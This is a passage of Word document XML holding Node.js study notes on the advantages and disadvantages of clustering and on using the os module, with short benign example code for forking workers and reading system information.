    <w:p w14:paraId="3F2B1954" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Complex Deployment and Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737776BE" w14:textId="77777777" w:rsidR="00726583"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Managing a clustered application can be more complex compared to a single-process setup. It requires handling process management, monitoring, load balancing, and failover strategies. For smaller applications or teams with limited resources, this added complexity might not be justified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49133EF3" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8. Increased Memory Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0262C7B9" w14:textId="77777777" w:rsidR="00726583"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Each worker process in a cluster consumes additional memory. If your application is memory-intensive and the overall system memory is limited, the memory overhead introduced by clustering could be a concern. In such cases, optimizing memory usage or considering other scaling strategies might be preferable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294B6B6" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9. External Load Balancing Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F04B62" w14:textId="08244E90" w:rsidR="0001503C" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustering does not inherently provide load balancing for incoming network requests. You'll still need an external load balancer to distribute requests among the different worker processes. If your scaling needs require sophisticated load balancing strategies, you might need to implement or configure additional infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E85617C" w14:textId="77777777" w:rsidR="004C56AB" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc178383280"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are the advantages and disadvantages of clustering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="68A0F459" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Advantages of Clustering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CAE0FE" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Utilizes Multi-Core Processors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F260E8B"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Advantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Clustering allows you to take full advantage of multi-core processors. Each worker process can run on a different CPU core, which can lead to significant performance improvements in CPU-bound applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208D306"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 application handling a high number of simultaneous requests can distribute the load across multiple cores, improving overall throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37946692" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Performance and Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FBD43"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Advantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: By spawning multiple instances of your application, clustering can improve performance and handle more concurrent connections. This leads to better scalability and responsiveness under high load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CA574"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Web servers handling large volumes of traffic can benefit from clustering by distributing incoming requests across multiple worker processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4457B" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A6090"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Advantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If one worker process crashes, the remaining workers can continue to operate, reducing the impact of the failure. The master process can restart the crashed worker, improving the application's resilience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65676F45"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production environment, clustering can help maintain service availability even if individual processes encounter issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2486AD" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplified Load Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F882B"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lastRenderedPageBreak/>
        <w:t>Advantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Node.js cluster module handles load balancing between worker processes automatically, which simplifies the process of distributing incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7627B3FB"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 clustered Node.js application can handle HTTP requests more efficiently by balancing the load among multiple workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C30A6A2" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Resource Efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217577D6"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Advantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Clustering can be more resource-efficient than running multiple instances of the application with separate ports. All workers share the same port and network stack, leading to more efficient resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3282FE45"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Instead of running several instances of a server on different ports, a clustered server can share resources while still scaling across multiple CPU cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66617960" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disadvantages of Clustering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A4FAF" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Increased Complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234FD76D"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Disadvantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Managing a clustered environment adds complexity to the application. You need to handle process management, inter-process communication (IPC), and potential state synchronization issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490824D3"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Developers must implement mechanisms to manage worker processes, handle IPC, and ensure that shared state is synchronized across workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58797D48" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C809B3"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Disadvantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Each worker process in a cluster consumes additional memory. If your application is already memory-intensive, clustering can lead to increased memory usage and potential resource constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028E9FF"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 clustered application with multiple workers might exceed the available system memory, leading to performance degradation or crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA5D0E7" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Limited State Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204BEBA9"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Disadvantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Worker processes do not share memory, which can make state management challenging. You need to implement external mechanisms to share state, such as databases, distributed caches, or message queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C7FA6"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If your application requires shared state, such as user sessions, you'll need to use external storage solutions to synchronize state across workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9C132" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Potential Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5765B"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Disadvantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Clustering introduces IPC overhead for communication between worker processes. For applications with frequent or large data transfers between workers, this overhead can impact performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A36B4"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Applications that require intensive IPC for coordination or data exchange may experience performance issues due to the additional overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138199B2" w14:textId="77777777" w:rsidR="009A6D38" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Configuration and Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1F044" w14:textId="77777777" w:rsidR="009A6D38"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Disadvantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Setting up and deploying a clustered application can be more complex than a single-process application. You'll need to configure process management, load balancing, and fault tolerance, which can be challenging in some environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38193F6B" w14:textId="6E866B38" w:rsidR="004C56AB" w:rsidRPr="00DA2F32" w:rsidRDefault="009A6D38"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Deploying a clustered Node.js application may require additional configuration and tools, such as process managers (e.g., PM2) and load balancers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572CD349" w14:textId="342CDCA4" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc178383281"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For what purpose we will use OS module for clustering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="10BB57C0"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The os module in Node.js provides operating system-related utility methods and properties. When dealing with clustering, the os module can be used for several important purposes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E221A11" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Determining the Number of CPU Cores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4EFCA7"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To dynamically determine the number of available CPU cores on the machine. This is useful for deciding how many worker processes to spawn in a clustered Node.js application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F83E2"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51B3609F" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use the os.cpus() method to get an array of objects containing information about each CPU core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EA6B3" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Determine the number of cores by checking the length of this array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E134C"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4568B41D"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os = require('os');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2921A"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cluster = require('cluster');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153BD9EC"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numCPUs = os.cpus().length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423EA7B"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0E74FEA"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if (cluster.isMaster) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F1BF0B"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console.log(`Master ${process.pid} is running`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693AC636"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ED2EED2"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Fork workers based on the number of CPU cores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D20A2AA"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for (let i = 0; i &lt; numCPUs; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780D2C52"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cluster.fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A3A74"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25146F1"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31B3404"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cluster.on('exit', (worker, code, signal) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7343A"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console.log(`Worker ${worker.process.pid} died`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8B7D71"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4582B39"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157EF503"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Workers can share the same TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A3C9F"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require('./app'); // Load your application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C447302"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8FCE5FF" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Gathering System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910526A"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To collect system-related information that can be useful for monitoring and debugging, such as system uptime, memory usage, and load averages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223659D7"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1A2162D3" w14:textId="77777777" w:rsidR="00D01DA1" w:rsidRPr="00DA2F32" w:rsidRDefault="00D01DA1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Methods such as os.uptime(), os.totalmem(), os.freemem(), and os.loadavg() provide insights into system performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD90AB4"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00B672FA"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os = require('os');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72659B30"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EFF6D63"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console.log('System Uptime:', os.uptime(), 'seconds');</w:t>
      </w:r>
    </w:p>
